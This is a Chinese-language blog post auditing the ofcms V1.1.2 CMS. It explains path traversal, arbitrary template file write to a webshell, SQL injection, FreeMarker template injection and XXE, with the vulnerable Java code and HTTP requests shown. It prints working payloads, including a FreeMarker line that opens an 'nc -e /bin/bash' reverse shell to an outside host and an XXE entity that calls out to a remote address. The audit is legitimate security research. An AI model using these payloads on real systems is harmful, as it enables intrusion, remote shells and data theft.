<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>ofcms-V1.1.2审计 - 秋秋晚</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="秋秋晚"><meta name="msapplication-TileImage" content="https://tvax4.sinaimg.cn/large/e6c9d24egy1h23f8ujgnpj208c08ca9x.jpg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="秋秋晚"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="前言代码写累了，继续搞搞审计"><meta property="og:type" content="blog"><meta property="og:title" content="秋秋晚"><meta property="og:url" content="https://lhxhl.github.io/"><meta property="og:site_name" content="秋秋晚"><meta property="og:description" content="前言代码写累了，继续搞搞审计"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://i.328888.xyz/2023/01/10/CwOZk.jpeg"><meta property="article:published_time" content="2023-04-07T13:48:33.394Z"><meta property="article:modified_time" content="2023-04-09T08:50:25.574Z"><meta property="article:author" content="秋秋晚"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="https://i.328888.xyz/2023/01/10/CwOZk.jpeg"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://lhxhl.github.io/2023/04/07/ofcms/"},"headline":"秋秋晚","image":["https://p.ipic.vip/5mlz3t.png","https://p.ipic.vip/duh9vm.png","https://p.ipic.vip/l5z3wy.png","https://p.ipic.vip/lr4key.png","https://p.ipic.vip/25gvyf.png","https://p.ipic.vip/14twtq.png","https://p.ipic.vip/oxnwx4.png","https://p.ipic.vip/ntrffn.png","https://p.ipic.vip/swvbsn.png","https://p.ipic.vip/86ldt1.png"],"datePublished":"2023-04-07T13:48:33.394Z","dateModified":"2023-04-09T08:50:25.574Z","author":{"@type":"Person","name":"秋秋晚"},"description":"前言代码写累了，继续搞搞审计"}</script><link rel="canonical" href="https://lhxhl.github.io/2023/04/07/ofcms/"><link rel="icon" href="https://tvax4.sinaimg.cn/large/e6c9d24egy1h23f8ujgnpj208c08ca9x.jpg"><meta name="referrer" content="no-referrer-when-downgrade"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/9.12.0/styles/atom-one-light.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro|Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Microsoft YaHei:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&amp;amp;subset=latin,latin-ext|Inconsolata|Itim|Lobster.css"><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="/js/globalUtils.js"></script><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/pace/1.0.2/pace.min.js"></script><meta name="generator" content="Hexo 6.1.0"></head><body class="is-3-column has-navbar-fixed-top"><nav class="navbar navbar-main is-fixed-top"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/">秋秋晚</a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Join Gitter" href="https://gitter.im/hexo-theme-amazing/community"><i class="fab fa-gitter"></i></a><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/removeif/hexo-theme-amazing"><i class="fab fa-github"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a><a class="navbar-item" id="night-nav" title="Night Mode" href="javascript:;"><i class="fas fa-moon" id="night-icon"></i></a></div></div></div></nav><script type="text/javascript" src="/js/theme-setting.js"></script><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><!--!--><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><i class="far fa-calendar-plus"> </i>2023-04-07  <a class="commentCountImg" href="/2023/04/07/ofcms/#comment-container"><span class="display-none-class">06676b84acbc75b3e9298c5e4089046b</span><i class="far fa-comment-dots"></i> <span class="commentCount" id="06676b84acbc75b3e9298c5e4089046b">99+</span>  </a><span class="level-item"><i class="far fa-clock"> </i>9 分钟  <i class="fas fa-pencil-alt"> </i>1.4 k</span><span class="level-item" id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv">0</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">ofcms-V1.1.2审计</h1><div class="content"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p><strong>代码写累了，继续搞搞审计</strong></p>
<span id="more"></span>

<h1 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h1><h2 id="路径遍历-文件读取"><a href="#路径遍历-文件读取" class="headerlink" title="路径遍历/文件读取"></a>路径遍历/文件读取</h2><p><strong>前台没啥东西，直接进后台看看。发现有个模版设置，这种地方一般可以更改页面，写shell啥的，如果没做过滤的话。</strong></p>
<p><strong>抓一个包看看，这些参数我们可控</strong></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">GET /ofcms_admin_war/admin/cms/template/getTemplates.html?file_name=index.html&amp;<span class="built_in">dir</span>=/&amp;dir_name=/</span><br></pre></td></tr></table></figure>

<p><strong>根据路径定位到代码中，在<code>TemplateController.java</code>中，有个<code>getTemplates</code>方法可以渲染模版文件</strong></p>
<p><strong>这里接收我们传入的参数</strong></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">getTemplates</span><span class="params">()</span> &#123;</span><br><span class="line"><span class="comment">//当前目录</span></span><br><span class="line">        <span class="type">String</span> <span class="variable">dirName</span> <span class="operator">=</span> getPara(<span class="string">&quot;dir&quot;</span>,<span class="string">&quot;&quot;</span>);</span><br><span class="line">        <span class="comment">//上级目录</span></span><br><span class="line">        <span class="type">String</span> <span class="variable">upDirName</span> <span class="operator">=</span> getPara(<span class="string">&quot;up_dir&quot;</span>,<span class="string">&quot;/&quot;</span>);</span><br><span class="line">        <span class="comment">//类型区分</span></span><br><span class="line">            <span class="type">String</span> <span class="variable">resPath</span> <span class="operator">=</span> getPara(<span class="string">&quot;res_path&quot;</span>);</span><br><span class="line">        <span class="comment">//文件目录</span></span><br><span class="line">        <span class="type">String</span> <span class="variable">dir</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">        <span class="keyword">if</span>(!<span class="string">&quot;/&quot;</span>.equals(upDirName))&#123;</span><br><span class="line">              dir = upDirName+dirName;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">              dir = dirName;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="type">File</span> <span class="variable">pathFile</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">        <span class="keyword">if</span>(<span class="string">&quot;res&quot;</span>.equals(resPath))&#123;</span><br><span class="line">            pathFile = <span class="keyword">new</span> <span class="title class_">File</span>(SystemUtile.getSiteTemplateResourcePath(),dir);</span><br><span class="line">        &#125;<span class="keyword">else</span> &#123;</span><br><span class="line">            pathFile = <span class="keyword">new</span> <span class="title class_">File</span>(SystemUtile.getSiteTemplatePath(),dir);</span><br><span class="line">        &#125;</span><br><span class="line">    ...</span><br></pre></td></tr></table></figure>

<p><strong>并且没有对目录名做限制，比如<code>../</code>，但是对文件名后缀有限制</strong></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">File[] files = pathFile.listFiles(<span class="keyword">new</span> <span class="title class_">FileFilter</span>() &#123;</span><br><span class="line">            <span class="meta">@Override</span></span><br><span class="line">            <span class="keyword">public</span> <span class="type">boolean</span> <span class="title function_">accept</span><span class="params">(File file)</span> &#123;</span><br><span class="line">                <span class="keyword">return</span> !file.isDirectory() &amp;&amp; (file.getName().endsWith(<span class="string">&quot;.html&quot;</span>) || file.getName().endsWith(<span class="string">&quot;.xml&quot;</span>)</span><br><span class="line">                        || file.getName().endsWith(<span class="string">&quot;.css&quot;</span>) || file.getName().endsWith(<span class="string">&quot;.js&quot;</span>));</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;);</span><br></pre></td></tr></table></figure>

<p><strong>得到文件名和目录后，会循环读出文件内容</strong></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (fileName != <span class="literal">null</span> &amp;&amp; files != <span class="literal">null</span> &amp;&amp; files.length &gt; <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">for</span> (File f : files) &#123;</span><br><span class="line">                <span class="keyword">if</span> (fileName.equals(f.getName())) &#123;</span><br><span class="line">                    editFile = f;</span><br><span class="line">                    <span class="keyword">break</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> (editFile == <span class="literal">null</span>) &#123;</span><br><span class="line">                editFile = files[<span class="number">0</span>];</span><br><span class="line">                fileName = editFile.getName();</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        setAttr(<span class="string">&quot;file_name&quot;</span>, fileName);</span><br><span class="line">        <span class="keyword">if</span> (editFile != <span class="literal">null</span>) &#123;</span><br><span class="line">            <span class="type">String</span> <span class="variable">fileContent</span> <span class="operator">=</span> FileUtils.readString(editFile);</span><br><span class="line">            <span class="keyword">if</span> (fileContent != <span class="literal">null</span>) &#123;</span><br><span class="line">                fileContent = fileContent.replace(<span class="string">&quot;&lt;&quot;</span>, <span class="string">&quot;&amp;lt;&quot;</span>).replace(<span class="string">&quot;&gt;&quot;</span>, <span class="string">&quot;&amp;gt;&quot;</span>);</span><br><span class="line">                setAttr(<span class="string">&quot;file_content&quot;</span>, fileContent);</span><br><span class="line">                setAttr(<span class="string">&quot;file_path&quot;</span>, editFile);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p><strong>尝试穿越目录，发现已经读不到index.html了，说明是成功的</strong></p>
<p><img src="https://p.ipic.vip/5mlz3t.png" alt="image-20230408152900712"></p>
<p><strong>我们当前所在的目录是<code>WEB-INF/page/default/</code>,可以尝试去读其他文件下的文件，比如jquery-1.10.1.min.js，web.xml这种后缀没有被过滤的配置文件</strong></p>
<p><img src="https://p.ipic.vip/duh9vm.png" alt="image-20230408150802839"></p>
<p><strong>都是可以成功读到的</strong></p>
<p><img src="https://p.ipic.vip/l5z3wy.png" alt="image-20230408151354023"></p>
<h2 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h2><p><strong>其中还有一个save方法</strong></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">    * 保存模板</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">   <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">save</span><span class="params">()</span> &#123;</span><br><span class="line">       <span class="type">String</span> <span class="variable">resPath</span> <span class="operator">=</span> getPara(<span class="string">&quot;res_path&quot;</span>);</span><br><span class="line">       <span class="type">File</span> <span class="variable">pathFile</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">       <span class="keyword">if</span>(<span class="string">&quot;res&quot;</span>.equals(resPath))&#123;</span><br><span class="line">           pathFile = <span class="keyword">new</span> <span class="title class_">File</span>(SystemUtile.getSiteTemplateResourcePath());</span><br><span class="line">       &#125;<span class="keyword">else</span> &#123;</span><br><span class="line">           pathFile = <span class="keyword">new</span> <span class="title class_">File</span>(SystemUtile.getSiteTemplatePath());</span><br><span class="line">       &#125;</span><br><span class="line">       <span class="type">String</span> <span class="variable">dirName</span> <span class="operator">=</span> getPara(<span class="string">&quot;dirs&quot;</span>);</span><br><span class="line">       <span class="keyword">if</span> (dirName != <span class="literal">null</span>) &#123;</span><br><span class="line">           pathFile = <span class="keyword">new</span> <span class="title class_">File</span>(pathFile, dirName);</span><br><span class="line">       &#125;</span><br><span class="line">       <span class="type">String</span> <span class="variable">fileName</span> <span class="operator">=</span> getPara(<span class="string">&quot;file_name&quot;</span>);</span><br><span class="line">       <span class="comment">// 没有用getPara原因是，getPara因为安全问题会过滤某些html元素。</span></span><br><span class="line">       <span class="type">String</span> <span class="variable">fileContent</span> <span class="operator">=</span> getRequest().getParameter(<span class="string">&quot;file_content&quot;</span>);</span><br><span class="line">       fileContent = fileContent.replace(<span class="string">&quot;&amp;lt;&quot;</span>, <span class="string">&quot;&lt;&quot;</span>).replace(<span class="string">&quot;&amp;gt;&quot;</span>, <span class="string">&quot;&gt;&quot;</span>);</span><br><span class="line">       <span class="type">File</span> <span class="variable">file</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">File</span>(pathFile, fileName);</span><br><span class="line">       FileUtils.writeString(file, fileContent);</span><br><span class="line">       rendSuccessJson();</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>



<p><strong>点保存可以抓个包</strong></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">POST /ofcms_admin_war/admin/cms/template/save.json HTTP/1.1</span><br><span class="line">Host: localhost:8082</span><br><span class="line">Content-Length: 201</span><br><span class="line">sec-ch-ua: <span class="string">&quot;(Not(A:Brand&quot;</span>;v=<span class="string">&quot;8&quot;</span>, <span class="string">&quot;Chromium&quot;</span>;v=<span class="string">&quot;98&quot;</span></span><br><span class="line">Accept: application/json, text/javascript, */*; q=0.01</span><br><span class="line">Content-Type: application/x-www-form-urlencoded; charset=UTF-8</span><br><span class="line">X-Requested-With: XMLHttpRequest</span><br><span class="line">sec-ch-ua-mobile: ?0</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36</span><br><span class="line">sec-ch-ua-platform: <span class="string">&quot;macOS&quot;</span></span><br><span class="line">Origin: http://localhost:8082</span><br><span class="line">Sec-Fetch-Site: same-origin</span><br><span class="line">Sec-Fetch-Mode: cors</span><br><span class="line">Sec-Fetch-Dest: empty</span><br><span class="line">Referer: http://localhost:8082/ofcms_admin_war/admin/cms/template/getTemplates.html</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Cookie: JSESSIONID=8E14C550C62D9AF51B22E85F263D31D1</span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">file_path=&amp;<span class="built_in">dirs</span>=&amp;res_path=&amp;file_name=&amp;file_content=</span><br></pre></td></tr></table></figure>



<p><strong>可以修改模版，文件名和内容我们都可控，可以发现代码里也是没有任何过滤，直接将file_name和pathFile拼接了。</strong></p>
<p><img src="https://p.ipic.vip/lr4key.png" alt="image-20230408162424676"></p>
<p><strong>然后直接将对应内容写入，所以我们可以写入木马，连接webshell</strong></p>
<p><img src="https://p.ipic.vip/25gvyf.png" alt="image-20230408162641562"></p>
<h2 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h2><p><strong>在代码生成处的增加表存在sql注入</strong></p>
<p><strong>直接传个单引号发现会报错</strong></p>
<p><img src="https://p.ipic.vip/14twtq.png" alt="image-20230408210441999"></p>
<p><strong>按照黑盒测试的思路，直接上sqlmap跑跑看，开始跑出是mysql，但是跑不出具体payload，将level提高到3就跑出来了。报错注入。</strong></p>
<p><img src="https://p.ipic.vip/oxnwx4.png" alt="image-20230408210603720"></p>
<p><strong>我们跟进到具体的代码，在控制器<code>SystemGenerateController.java</code></strong></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">	 * 创建表</span></span><br><span class="line"><span class="comment">	 */</span></span><br><span class="line">	<span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">create</span><span class="params">()</span> &#123;</span><br><span class="line">		<span class="keyword">try</span> &#123;</span><br><span class="line">			<span class="type">String</span> <span class="variable">sql</span> <span class="operator">=</span> getPara(<span class="string">&quot;sql&quot;</span>);</span><br><span class="line">			Db.update(sql);</span><br><span class="line">			rendSuccessJson();</span><br><span class="line">		&#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">			e.printStackTrace();</span><br><span class="line">			rendFailedJson(ErrorCode.get(<span class="string">&quot;9999&quot;</span>), e.getMessage());</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p><strong>就三行，再跟进update，一直到这里</strong></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">update</span><span class="params">(Config config, Connection conn, String sql, Object... paras)</span> <span class="keyword">throws</span> SQLException &#123;</span><br><span class="line">    <span class="type">PreparedStatement</span> <span class="variable">pst</span> <span class="operator">=</span> conn.prepareStatement(sql);</span><br><span class="line">    config.dialect.fillStatement(pst, paras);</span><br><span class="line">    <span class="type">int</span> <span class="variable">result</span> <span class="operator">=</span> pst.executeUpdate();</span><br><span class="line">    DbKit.close(pst);</span><br><span class="line">    <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>看到这里，虽然是用了预编译，但是并没有采取占位符进行参数化查询，直接executeUpdate执行了。所以等于没有过滤。</strong></p>
<h2 id="freemarker模版注入"><a href="#freemarker模版注入" class="headerlink" title="freemarker模版注入"></a>freemarker模版注入</h2><p><strong>引入了又漏洞的模版依赖</strong></p>
<p><img src="https://p.ipic.vip/ntrffn.png" alt="image-20230409154016934"></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/nice0e3/p/16217471.html">https://www.cnblogs.com/nice0e3/p/16217471.html</a></p>
<p><a target="_blank" rel="noopener" href="https://tttang.com/archive/1412/#toc_0x01-freemarker">https://tttang.com/archive/1412/#toc_0x01-freemarker</a></p>
<p><strong>漏洞位置依然在后台模版文件处，我们可以修改相关页面。添加利用poc。</strong></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">&lt;#assign value=<span class="string">&quot;freemarker.template.utility.Execute&quot;</span>?<span class="keyword">new</span>()&gt;$&#123;value(<span class="string">&quot;nc -e /bin/bash ip port&quot;</span>)&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://p.ipic.vip/swvbsn.png" alt="image-20230409154341409"></p>
<p><strong>再去前台刷新about页面，就会执行命令，实现模版注入</strong></p>
<h2 id="XXE"><a href="#XXE" class="headerlink" title="XXE"></a>XXE</h2><p><strong>在<code>src/main/java/com/ofsoft/cms/admin/controller/ReprotAction.java</code>的export方法中</strong></p>
<p><strong>这里获取文件路径和文件名</strong></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">expReport</span><span class="params">()</span> &#123;</span><br><span class="line">		<span class="type">HttpServletResponse</span> <span class="variable">response</span> <span class="operator">=</span> getResponse();</span><br><span class="line">		Map&lt;String, Object&gt; hm = getParamsMap();</span><br><span class="line">		<span class="type">String</span> <span class="variable">jrxmlFileName</span> <span class="operator">=</span> (String) hm.get(<span class="string">&quot;j&quot;</span>);</span><br><span class="line">		jrxmlFileName = <span class="string">&quot;/WEB-INF/jrxml/&quot;</span> + jrxmlFileName + <span class="string">&quot;.jrxml&quot;</span>;</span><br><span class="line">		<span class="type">File</span> <span class="variable">file</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">File</span>(PathKit.getWebRootPath() + jrxmlFileName);</span><br><span class="line">		<span class="type">String</span> <span class="variable">fileName</span> <span class="operator">=</span> (String) hm.get(<span class="string">&quot;reportName&quot;</span>);</span><br><span class="line">		log.info(<span class="string">&quot;报表文件名[&#123;&#125;]&quot;</span>, file.getPath());</span><br><span class="line">		 <span class="type">OutputStream</span> <span class="variable">out</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br></pre></td></tr></table></figure>

<p><strong>文件名可控，但是后缀写死了。file对象直接拼接了文件路径，所以这里是可以穿越的</strong></p>
<p><strong>下面进入try</strong></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">JasperCompileManager.compileReport(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(file)), hm,dataSource.getConnection());</span><br></pre></td></tr></table></figure>

<p><strong>这里传入file对象，就是jrxml的文件内容，然后一直跟进</strong></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> JasperReport <span class="title function_">compile</span><span class="params">(InputStream inputStream)</span> <span class="keyword">throws</span> JRException &#123;</span><br><span class="line">        <span class="type">JasperDesign</span> <span class="variable">jasperDesign</span> <span class="operator">=</span> JRXmlLoader.load(inputStream);</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">this</span>.compile(jasperDesign);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p><strong>可以发现这里就直接解析了xml文件，没有过滤。</strong></p>
<p><strong>所以利用思路，我们可以利用前面的文件上传，上传一个jrxml文件</strong></p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">foo</span> [ <span class="meta">&lt;!ENTITY % <span class="keyword">xxe</span> <span class="keyword">SYSTEM</span> <span class="string">&quot;http://ip:port&quot;</span>&gt;</span> %xxe;]&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>然后访问</strong></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">http://localhost:8082/ofcms_admin_war/admin/reprot/expReport.html?j=../../static/kk</span><br></pre></td></tr></table></figure>

<p><img src="https://p.ipic.vip/86ldt1.png" alt="image-20230409164910420"></p>
<p><strong>成功接到http请求</strong></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>ofcms-V1.1.2审计</p><p><a href="https://lhxhl.github.io/2023/04/07/ofcms/">https://lhxhl.github.io/2023/04/07/ofcms/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><a href="https://lhxhl.github.io"><p>秋秋晚</p></a></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2023-04-07</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2023-04-09</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icon" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a><a class="icon" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a><a class="icon" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="recommend-area"><div class="recommend-post"><span class="is-size-6 has-text-grey has-mr-7"># 相关文章</span><br><span>  1.<a class="is-size-6" href="/2023/04/01/oasys/" target="_blank">经典oasys(OA自动化办公系统)审计</a><br></span><span>  2.<a class="is-size-6" href="/2023/03/28/tmall/" target="_blank">迷你天猫商城系统审计</a><br></span><span>  3.<a class="is-size-6" href="/2023/03/14/shiro1/" target="_blank">shiro反序列化分析(一)</a><br></span><span>  4.<a class="is-size-6" href="/2023/03/07/java_sec_other/" target="_blank">Java_Sec_Code---其他漏洞审计</a><br></span><span>  5.<a class="is-size-6" href="/2023/02/03/java_sec_sqli/" target="_blank">Java_Sec_Code---Sql注入代码审计</a><br></span><span>  6.<a class="is-size-6" href="/2022/11/27/CC6/" target="_blank">CommonsCollections6利用链分析</a><br></span><span>  7.<a class="is-size-6" href="/2022/11/06/CC11/" target="_blank">CommonsCollections1利用链分析---LazyMap链</a><br></span><span>  8.<a class="is-size-6" href="/2022/11/03/CC1/" target="_blank">CommonsCollections1利用链分析</a><br></span></div></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/css/share.min.css"><div class="social-share"></div><script src="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3><div class="buttons is-centered"><a class="button donate" data-type="alipay"><span class="icon is-small"><i class="fab fa-alipay"></i></span><span>支付宝</span><span class="qrcode"><img src="/" alt="支付宝"></span></a><a class="button donate" data-type="wechat"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>微信</span><span class="qrcode"><img src="/" alt="微信"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2023/04/11/vueLearn/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">Vue框架学习</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2023/04/03/minio2023/"><span class="level-item">Minio信息泄露---CVE-2023-28432</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--><div class="card"><div class="card-content"><div class="title is-5">评论</div><div id="comment-container"></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/gitalk/1.6.0/gitalk.css"><script> $.getScript('/js/gitalk.min.js', function () { 
            var gitalk = new Gitalk({
            language:'zh-CN',
            id: '06676b84acbc75b3e9298c5e4089046b',
            repo: 'blog_comment',
            owner: 'LHXHL',
            clientID: '9901fc9cd07fca97d9c5',
            clientSecret: '676e4024a92c4843a002172e7c57dd2a9875f238',
            admin: ["LHXHL"],
            createIssueManually: true,
            distractionFreeMode: false,
            perPage: 10,
            pagerDirection: 'last',
            proxy: 'https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token',
            
            enableHotKey: true,
            isLocked: false
        })
        gitalk.render('comment-container')});</script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1 is-sticky"><!--!--><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="https://i.328888.xyz/2023/01/10/CwOZk.jpeg" alt="秋秋晚"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">秋秋晚</p><p class="is-size-6 is-block">Web &amp;&amp; Pentest &amp;&amp; Moonlight</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>白玉盘</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives"><p class="title">49</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories"><p class="title">22</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags"><p class="title">0</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/LHXHL" target="_blank" rel="noopener">关注我</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/LHXHL"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div><div><hr><p id="hitokoto">:D 一言句子获取中...</p><script type="text/javascript" defer>function getYiyan(){
                                $.getJSON("https://v1.hitokoto.cn/", function (data) {
                                if(data){
                                    $('#hitokoto').html("");
                                    $('#hitokoto').append("<strong style='color: #3273dc;'>"+data.hitokoto+"</strong>"+
                                    "<p>"+"来源《"+data.from+"》</p><p>提供者-"+data.creator+"</p>");
                                }});}
                                $(function (){getYiyan();$('#hitokoto').click(function(){getYiyan();})});</script></div></div></div><div class="card widget" data-type="links"><div class="card-content"><div class="menu"><h3 class="menu-label">链接</h3><ul class="menu-list"><li><a class="level is-mobile" href="https://www.wolai.com/lnk3377/tX4XuAytAbP7kFrakykAbx" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">CTF做题笔记</span></span><span class="level-right"><span class="level-item tag">www.wolai.com</span></span></a></li><li><a class="level is-mobile" href="https://www.wolai.com/lnk3377/sXchgZ2ArybVqFfkTrEsZN" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">打靶机记录</span></span><span class="level-right"><span class="level-item tag">www.wolai.com</span></span></a></li><li><a class="level is-mobile" href="https://zikh26.github.io/" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">ZIKH26-Pwn👴</span></span><span class="level-right"><span class="level-item tag">zikh26.github.io</span></span></a></li><li><a class="level is-mobile" href="https://www.yuxuanzhe.com" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">YuXuanZhe-Web佬</span></span><span class="level-right"><span class="level-item tag">www.yuxuanzhe.com</span></span></a></li><li><a class="level is-mobile" href="https://maomaoqing.github.io/" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">HXD😄</span></span><span class="level-right"><span class="level-item tag">maomaoqing.github.io</span></span></a></li></ul></div></div></div><!--!--><div class="card widget"><div 